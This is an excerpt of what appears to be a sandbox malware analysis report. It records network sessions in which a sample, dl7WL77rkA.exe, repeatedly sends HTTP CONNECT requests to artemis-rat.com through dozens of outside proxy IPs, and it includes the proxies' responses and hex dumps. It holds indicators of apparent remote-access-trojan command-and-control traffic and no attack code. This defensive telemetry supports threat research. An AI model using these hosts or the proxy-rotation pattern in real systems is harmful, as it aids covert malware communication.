                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1648192.168.2.554610172.67.182.102803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.473851919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.628844023 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1649192.168.2.554604216.169.73.65346793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.477005959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.014180899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514662027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.584357023 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1650192.168.2.55451789.168.121.17531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.478677988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.030585051 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1651192.168.2.55447777.91.74.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.481108904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.816641092 CET129INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Location: https://artemis-rat.com:443
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1652192.168.2.554629172.67.181.89803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.482943058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.637444019 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1653192.168.2.55411565.169.38.73265923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.488612890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1654192.168.2.554615164.92.86.113573913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.490530968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.014522076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702224016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.797343016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1655192.168.2.55294681.91.231.5780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.496519089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.130217075 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 716
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 12 Feb 2024 09:31:00 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 12 Feb 2024 09:31:00 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1656192.168.2.55471843.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.500852108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1657192.168.2.554667104.20.75.132803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.502748013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.658256054 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1658192.168.2.55472043.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.503278017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1659192.168.2.55472243.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.504158974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1660192.168.2.55472543.153.108.1264433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505412102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1661192.168.2.55474243.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.509008884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1662192.168.2.55474543.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.510570049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1663192.168.2.55475143.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.512815952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1664192.168.2.55475343.157.50.2064433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.513420105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1665192.168.2.554119192.111.130.5170023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.520996094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1666192.168.2.55459038.162.8.16731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.521341085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.933722019 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1667192.168.2.553877178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.534751892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1668192.168.2.55481491.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.546200037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1669192.168.2.55481791.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.547391891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1670192.168.2.55481991.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.549323082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1671192.168.2.55482291.231.186.1334433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.550968885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1672192.168.2.550313103.155.166.14981813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.552455902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.595424891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1673192.168.2.55450889.42.198.7941533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.629987001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1674192.168.2.554665154.205.152.9631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.630059004 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.839514017 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.929788113 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.209650040 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.965766907 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.324042082 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:28.801558018 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:09.761943102 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1675192.168.2.554015107.180.103.214616343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.639262915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.701791048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
